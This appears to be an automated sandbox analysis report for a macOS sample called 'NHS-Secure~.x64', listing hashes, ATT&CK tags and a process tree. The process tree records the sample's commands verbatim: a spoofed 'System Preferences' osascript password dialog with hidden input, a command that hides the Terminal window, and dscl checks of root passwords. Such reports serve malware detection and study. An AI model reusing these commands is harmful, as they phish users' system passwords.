6e95df731cc0996e8d579ec1202701d564c43c3a37618df418a768547e1cbce6

Resubmissions

04-07-2024 20:34

240704-zcklgazeka 4

03-07-2024 21:53

240703-1rwgyszclh 4

Analysis

max time kernel
290s
max time network
294s
platform
macos-10.15_amd64
resource
macos-20240611-en
resource tags

arch:amd64arch:i386image:macos-20240611-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
submitted
04-07-2024 20:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ttmm/NHS-Secure~.x64
Size

471KB
MD5

43e667c3cc5dbef0531d5f44219a0bdf
SHA1

195199774b506caeaf5399b40c44bfd1ba86e452
SHA256

681eb5050ff67795e494db2081e5040f0014164ebe2393ec9e3789f92734b5cd
SHA512

b19b054f3295ede4b97709d1c84f3e98ff5ded9b5dbc3449c49e53a03596f76bcc871afa8bf18c2381c09a7d1392a49dcc8e8c68a312f8dc8d2bfba876397567
SSDEEP

12288:yLMDfeKgMpO8cC++aGAMUMHsUL2GLFeR:yYbYnMHsULHLE

Score

4^/10

evasion execution

Malware Config

Signatures

AppleScript 1 TTPs 34 IoCs

AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.

execution

AppleScript

T1059.002

Processes:

ioc	process
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "tell application \"Terminal\" to set visible of front window to false"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"

Resource Forking 1 TTPs 1 IoCs
Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.
evasion

Resource Forking
T1564.009

Processes:

ioc process

/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy

ioc	process
/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy

/bin/sh
sh -c "sudo /bin/zsh -c \"/Users/run/ttmm/NHS-Secure~.x64\""
1⤵
PID:550

/bin/bash
sh -c "sudo /bin/zsh -c \"/Users/run/ttmm/NHS-Secure~.x64\""
1⤵
PID:550

/usr/bin/sudo
sudo /bin/zsh -c "/Users/run/ttmm/NHS-Secure~.x64"
1⤵
PID:550

/bin/zsh
/bin/zsh -c "/Users/run/ttmm/NHS-Secure~.x64"
2⤵
PID:551

/Users/run/ttmm/NHS-Secure~.x64
"/Users/run/ttmm/NHS-Secure~.x64"
2⤵
PID:551

/bin/sh
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:552

/bin/bash
sh -c "osascript -e 'tell application \"Terminal\" to set visible of front window to false'"
1⤵
PID:552

/usr/bin/osascript
osascript -e "tell application \"Terminal\" to set visible of front window to false"
1⤵
PID:552

/usr/libexec/xpcproxy
xpcproxy com.apple.nsurlstoraged
1⤵
PID:553

/usr/libexec/nsurlstoraged
/usr/libexec/nsurlstoraged
1⤵
PID:553

/usr/libexec/dmd
/usr/libexec/dmd
1⤵
PID:544

/usr/libexec/xpcproxy
xpcproxy com.apple.pluginkit.pkd
1⤵
PID:555

/usr/libexec/pkd
/usr/libexec/pkd
1⤵
PID:555

/usr/libexec/xpcproxy
xpcproxy com.apple.Terminal.1804
1⤵
PID:557

/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
1⤵
PID:557

/usr/bin/login
login -pf run
2⤵
PID:564

/bin/zsh
-zsh
3⤵
PID:568

/usr/libexec/path_helper
/usr/libexec/path_helper -s
4⤵
PID:569

/usr/bin/locale
locale LC_CTYPE
4⤵
PID:570

/usr/libexec/xpcproxy
xpcproxy com.apple.siri.context.service
1⤵
PID:561

/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService
/System/Library/PrivateFrameworks/ContextKit.framework/Versions/A/XPCServices/ContextService.xpc/Contents/MacOS/ContextService
1⤵
PID:561

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.systemsoundserverd
1⤵
PID:565

/usr/sbin/systemsoundserverd
/usr/sbin/systemsoundserverd
1⤵
PID:565

/usr/libexec/xpcproxy
xpcproxy com.apple.AccountPolicyHelper
1⤵
PID:566

/usr/libexec/xpcproxy
xpcproxy com.apple.audio.AudioComponentRegistrar
1⤵
PID:567

/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar
/System/Library/Frameworks/AudioToolbox.framework/AudioComponentRegistrar -daemon
1⤵
PID:567

/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
/System/Library/PrivateFrameworks/AccountPolicy.framework/XPCServices/com.apple.AccountPolicyHelper.xpc/Contents/MacOS/com.apple.AccountPolicyHelper
1⤵
PID:566

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputMenuAgent
1⤵
PID:573

/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
/System/Library/CoreServices/TextInputMenuAgent.app/Contents/MacOS/TextInputMenuAgent
1⤵
PID:573

/usr/libexec/xpcproxy
xpcproxy com.apple.TextInputSwitcher
1⤵
PID:574

/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
/System/Library/CoreServices/TextInputSwitcher.app/Contents/MacOS/TextInputSwitcher
1⤵
PID:574

/usr/libexec/xpcproxy
xpcproxy com.apple.sysmond
1⤵
PID:593

/usr/libexec/sysmond
/usr/libexec/sysmond
1⤵
PID:593

/usr/libexec/xpcproxy
xpcproxy com.apple.bird
1⤵
PID:594

/bin/sh
sh -c "mkdir /Users/root/1143605973"
1⤵
PID:595

/bin/bash
sh -c "mkdir /Users/root/1143605973"
1⤵
PID:595

/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
/System/Library/PrivateFrameworks/CloudDocsDaemon.framework/Versions/A/Support/bird
1⤵
PID:594

/bin/mkdir
mkdir /Users/root/1143605973
1⤵
PID:595

/bin/sh
sh -c "dscl /Local/Default -authonly root \"\""
1⤵
PID:596

/bin/bash
sh -c "dscl /Local/Default -authonly root \"\""
1⤵
PID:596

/usr/bin/dscl
dscl /Local/Default -authonly root
1⤵
PID:596

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:597

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:597

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings \\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:597

/usr/libexec/xpcproxy
xpcproxy com.apple.sandboxd
1⤵
PID:598

/usr/libexec/sandboxd
/usr/libexec/sandboxd
1⤵
PID:598

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump
1⤵
PID:599

/usr/sbin/spindump
/usr/sbin/spindump
1⤵
PID:599

/usr/libexec/xpcproxy
xpcproxy com.apple.tailspind
1⤵
PID:600

/usr/libexec/tailspind
/usr/libexec/tailspind
1⤵
PID:600

/usr/libexec/xpcproxy
xpcproxy com.apple.spindump_agent
1⤵
PID:601

/usr/libexec/spindump_agent
/usr/libexec/spindump_agent
1⤵
PID:601

/usr/libexec/xpcproxy
xpcproxy com.apple.ViewBridgeAuxiliary
1⤵
PID:603

/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary
/System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/XPCServices/ViewBridgeAuxiliary.xpc/Contents/MacOS/ViewBridgeAuxiliary
1⤵
PID:603

/usr/bin/pluginkit
/usr/bin/pluginkit -e ignore -i com.microsoft.OneDrive.FinderSync
1⤵
PID:605

/usr/sbin/spctl
/usr/sbin/spctl --assess --type execute /var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/T/OneDriveUpdater2E18A62F/OneDrive.app
1⤵
PID:606

/usr/libexec/xpcproxy
xpcproxy com.apple.security.cloudkeychainproxy3
1⤵
PID:608

/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy
/System/Library/Frameworks/Security.framework/Versions/A/Resources/CloudKeychainProxy.bundle/Contents/MacOS/CloudKeychainProxy
1⤵
PID:608

/bin/sh
sh -c "dscl /Local/Default -authonly root whatever"
1⤵
PID:610

/bin/bash
sh -c "dscl /Local/Default -authonly root whatever"
1⤵
PID:610

/usr/bin/dscl
dscl /Local/Default -authonly root whatever
1⤵
PID:610

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:611

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:611

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:611

/bin/sh
sh -c "dscl /Local/Default -authonly root whatever"
1⤵
PID:615

/bin/bash
sh -c "dscl /Local/Default -authonly root whatever"
1⤵
PID:615

/usr/bin/dscl
dscl /Local/Default -authonly root whatever
1⤵
PID:615

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:616

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:616

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:616

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportCrash.Root
1⤵
PID:617

/System/Library/CoreServices/ReportCrash
/System/Library/CoreServices/ReportCrash daemon
1⤵
PID:617

/usr/libexec/xpcproxy
xpcproxy com.apple.ReportMemoryException
1⤵
PID:618

/usr/libexec/ReportMemoryException
/usr/libexec/ReportMemoryException
1⤵
PID:618

/bin/sh
sh -c "dscl /Local/Default -authonly root sdadasdsaddssdfsdf"
1⤵
PID:620

/bin/bash
sh -c "dscl /Local/Default -authonly root sdadasdsaddssdfsdf"
1⤵
PID:620

/usr/bin/dscl
dscl /Local/Default -authonly root sdadasdsaddssdfsdf
1⤵
PID:620

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:621

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:621

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:621

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:622

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:622

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:622

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:623

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:623

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:623

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:624

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:624

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:624

/bin/sh
sh -c "dscl /Local/Default -authonly root root"
1⤵
PID:627

/bin/bash
sh -c "dscl /Local/Default -authonly root root"
1⤵
PID:627

/usr/bin/dscl
dscl /Local/Default -authonly root root
1⤵
PID:627

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:628

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:628

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:628

/bin/sh
sh -c "dscl /Local/Default -authonly root admin"
1⤵
PID:629

/bin/bash
sh -c "dscl /Local/Default -authonly root admin"
1⤵
PID:629

/usr/bin/dscl
dscl /Local/Default -authonly root admin
1⤵
PID:629

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:630

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:630

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:630

/usr/libexec/xpcproxy
xpcproxy com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:631

/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
/System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/XPCServices/com.apple.PerformanceAnalysis.animationperfd.xpc/Contents/MacOS/com.apple.PerformanceAnalysis.animationperfd
1⤵
PID:631

/usr/libexec/xpcproxy
xpcproxy com.apple.assistantd
1⤵
PID:634

/System/Library/PrivateFrameworks/AssistantServices.framework/Versions/A/Support/assistantd
/System/Library/PrivateFrameworks/AssistantServices.framework/Versions/A/Support/assistantd
1⤵
PID:634

/usr/sbin/spctl
/usr/sbin/spctl --assess --type execute /Applications/OneDrive.app
1⤵
PID:635

/usr/libexec/xpcproxy
xpcproxy com.apple.geod
1⤵
PID:639

/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
/System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/XPCServices/com.apple.geod.xpc/Contents/MacOS/com.apple.geod
1⤵
PID:639

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:642

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:642

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:642

/usr/libexec/xpcproxy
xpcproxy com.apple.pbs
1⤵
PID:643

/System/Library/CoreServices/pbs
/System/Library/CoreServices/pbs
1⤵
PID:643

/usr/libexec/xpcproxy
xpcproxy com.apple.DictionaryServiceHelper
1⤵
PID:644

/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/XPCServices/com.apple.DictionaryServiceHelper.xpc/Contents/MacOS/com.apple.DictionaryServiceHelper
/System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/DictionaryServices.framework/Versions/A/XPCServices/com.apple.DictionaryServiceHelper.xpc/Contents/MacOS/com.apple.DictionaryServiceHelper
1⤵
PID:644

/usr/libexec/xpcproxy
xpcproxy com.apple.ActivityMonitor.1800
1⤵
PID:645

/System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor
"/System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor"
1⤵
PID:645

/usr/libexec/xpcproxy
xpcproxy com.apple.colorsync.useragent
1⤵
PID:646

/System/Library/Frameworks/ColorSync.framework/Support/colorsync.useragent
/System/Library/Frameworks/ColorSync.framework/Support/colorsync.useragent
1⤵
PID:646

/usr/libexec/xpcproxy
xpcproxy com.apple.colorsyncd
1⤵
PID:647

/usr/libexec/colorsyncd
/usr/libexec/colorsyncd
1⤵
PID:647

/usr/libexec/xpcproxy
xpcproxy com.apple.AssetCacheManagerService
1⤵
PID:648

/System/Library/PrivateFrameworks/AssetCacheServicesExtensions.framework/XPCServices/AssetCacheManagerService.xpc/Contents/MacOS/AssetCacheManagerService
/System/Library/PrivateFrameworks/AssetCacheServicesExtensions.framework/XPCServices/AssetCacheManagerService.xpc/Contents/MacOS/AssetCacheManagerService
1⤵
PID:648

/usr/libexec/xpcproxy
xpcproxy com.apple.neagent.878568F8-CCE5-4157-8315-22F20DC8FB0A
1⤵
PID:649

/usr/libexec/neagent
/usr/libexec/neagent
1⤵
PID:649

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:650

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:650

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:650

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveUpdaterDaemon
1⤵
PID:651

/bin/launchctl
/bin/launchctl kill SIGTERM system/com.microsoft.OneDriveStandaloneUpdaterDaemon
1⤵
PID:652

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:655

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:655

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:655

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:662

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:662

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:662

/usr/libexec/xpcproxy
xpcproxy com.apple.suggestd
1⤵
PID:664

/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd
/System/Library/PrivateFrameworks/CoreSuggestions.framework/Versions/A/Support/suggestd
1⤵
PID:664

/usr/libexec/xpcproxy
xpcproxy com.apple.knowledge-agent
1⤵
PID:669

/usr/libexec/knowledge-agent
/usr/libexec/knowledge-agent
1⤵
PID:669

/usr/libexec/xpcproxy
xpcproxy com.apple.AddressBook.ContactsAccountsService
1⤵
PID:671

/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
/System/Library/Frameworks/AddressBook.framework/Executables/ContactsAccountsService
1⤵
PID:671

/usr/libexec/xpcproxy
xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
1⤵
PID:673

/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
/System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
1⤵
PID:673

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:674

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:674

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:674

/usr/libexec/xpcproxy
xpcproxy com.apple.routined
1⤵
PID:677

/usr/libexec/routined
/usr/libexec/routined LAUNCHED_BY_LAUNCHD
1⤵
PID:677

/usr/libexec/xpcproxy
xpcproxy com.apple.Maps.mapspushd
1⤵
PID:679

/System/Library/CoreServices/mapspushd
/System/Library/CoreServices/mapspushd
1⤵
PID:679

/bin/sh
